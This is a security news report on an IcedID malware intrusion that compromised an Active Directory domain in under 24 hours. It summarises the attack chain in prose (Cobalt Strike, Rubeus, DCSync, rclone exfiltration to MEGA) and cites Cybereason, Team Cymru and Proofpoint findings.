Active Directory Domain Compromised in Under 24 Hours

A recent IcedID malware attack enabled the threat actor to compromise the Active Directory domain of an unnamed target less than 24 hours after gaining initial access.

IcedID, also known as BokBot, started as a banking trojan in 2017 before evolving into a dropper for other malware, joining the likes of Emotet, TrickBot, Qakbot, Bumblebee, and Raspberry Robin.

Attacks involving the delivery of IcedID have leveraged various methods, especially in the wake of Microsoft’s decision to block macros from Office files downloaded from the web.

The intrusion in question is no different in that the infection chain begins with an ISO image file contained within a ZIP archive that culminates in the execution of the IcedID payload.

The malware then establishes persistence on the host via a scheduled task. It communicates with a remote server to download additional payloads, including Cobalt Strike Beacon, for follow-on reconnaissance activity.

It also carries out lateral movement across the network. It executes the same Cobalt Strike Beacon in all those workstations and then proceeds to install Atera agent, a legitimate remote administration tool, as a redundant remote access mechanism.

Utilizing IT tools like this allows attackers to create an additional ‘backdoor’ for themselves if their initial persistence mechanisms are discovered and remediated. These tools are less likely detected by antivirus or EDR and more likely to be written off as false positives.

Source: Cybereason

The Cobalt Strike Beacon is further used as a conduit to download a C# tool dubbed Rubeus for credential theft, ultimately permitting the threat actor to move laterally to a Windows Server with domain admin privileges.

The elevated permissions are then weaponized to stage a DCSync attack, allowing the adversary to simulate the behavior of a domain controller (DC) and retrieve credentials from other domain controllers.

Other tools used as part of the attack include a legitimate utility named netscan.exe to scan the network for lateral movement and the rclone file syncing software to exfiltrate directories of interest to the MEGA cloud storage service.

The findings come as researchers from Team Cymru shed more light on the BackConnect (BC) protocol used by IcedID to deliver additional functionality post-compromise, including a VNC module that provides a remote-access channel.

“In the case of BC, there appear to be two operators managing the overall process within distinct roles,” the researchers noted last month, adding “much of the activity occurs during the typical working week.”

The development also follows a report from Proofpoint in November 2022 that a resurgence in Emotet activity has been linked to the distribution of a new version of IcedID.

Source: THN, Cybereason